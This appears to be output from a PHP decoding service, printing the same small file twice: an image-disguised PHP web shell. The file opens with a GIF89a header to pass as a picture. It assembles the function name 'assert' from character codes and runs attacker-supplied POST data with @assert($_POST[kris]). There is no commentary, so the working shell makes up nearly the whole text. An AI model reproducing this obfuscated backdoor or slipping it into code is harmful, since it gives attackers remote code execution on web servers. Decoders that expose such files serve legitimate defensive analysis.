Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
GIF89a <? $ran = 'cmFuZ2U='; $ran1 = 'ba'.'se'.'64'.'_decode'; $int = $ran1($ran); $i..
Decoded Output download
GIF89a
<?
$ran = 'cmFuZ2U=';
$ran1 = 'ba'.'se'.'64'.'_decode';
$int = $ran1($ran);
$int1 = $int(0,200);
$ch = 'c'.'h'.'r';
$ch1=$ch($int1[97]).$ch($int1[115]).$ch($int1[115]);
$ch2=$ch($int1[101]).$ch($int1[114]).$ch($int1[116]);
$ass = $ch1.$ch2;
@$ass($_POST[kris]);
?>
Did this file decode correctly?
Original Code
GIF89a
<?
$ran = 'cmFuZ2U=';
$ran1 = 'ba'.'se'.'64'.'_decode';
$int = $ran1($ran);
$int1 = $int(0,200);
$ch = 'c'.'h'.'r';
$ch1=$ch($int1[97]).$ch($int1[115]).$ch($int1[115]);
$ch2=$ch($int1[101]).$ch($int1[114]).$ch($int1[116]);
$ass = $ch1.$ch2;
@$ass($_POST[kris]);
?>
Function Calls
range | 1 |
base64_decode | 1 |
Stats
MD5 | 5f104567e499831eb2212f25692088fc |
Eval Count | 0 |
Decode Time | 92 ms |